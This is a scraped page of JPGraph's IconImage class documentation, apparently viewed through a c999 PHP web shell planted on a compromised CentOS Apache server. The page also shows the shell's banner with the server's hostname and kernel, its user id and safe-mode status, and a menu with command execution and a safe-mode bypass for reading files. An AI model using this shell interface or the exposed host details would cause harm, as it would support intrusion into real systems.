Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/jpgraph/docs/ref/ drwxr-xr-x |
Viewing file: IconImage.html (6.94 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | CLASS IconImage
(Defined in: jpgraph_gantt.php : 1413)
Class usage and Overview Icon object to be used in a title for a Gantt plot object, e.g. bar or milestones.
The icons are then used exactly as you would use text strings when specifying a title for the gantt object. For example:
Hint: When using icons togehter with titles the height of each bar is not affected (by design!) of the icons height. If you are using icons in several rows it might therefore be usefull to increase the vertical margin factor between each row. This is done by a call to the method GanttGarph::SetVMarginFactor()
Class Methods
Description Create a new icon object to be used in a title for a Gantt plot object, e.g. bar or milestones.
An icon can either be created from an arbitrary image file (type is determined by the file extension) or it can also be one of the builtin icons. The builtin icons are:
A graphic illustration of the differenmt icons can be found in the manual. The second argument specifies an optional scaling factor for the image/builtin icon.
The icons are then used exactly as you would use text strings when specifying a title for the gantt object. For example:
Hint: When using icons togehter with titles the height of each bar is not affected (by design!) of the icons height. If you are using icons in several rows it might therefore be usefull to increase the vertical margin factor between each row. This is done by a call to the method GanttGarph::SetVMarginFactor() See also GanttGraph::SetVMarginFactor
Example // of original size $icon = new IconImage("smiley.png",0.7); // Using on of the bultin icons $icon = new IconImage(GICON_TEXT,0.8);
Description Specify where the anchor point for the icon should be. valid anchor points (for both hor and ver - directions) are:
Example $icon->SetAlign('center','center');
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]-- |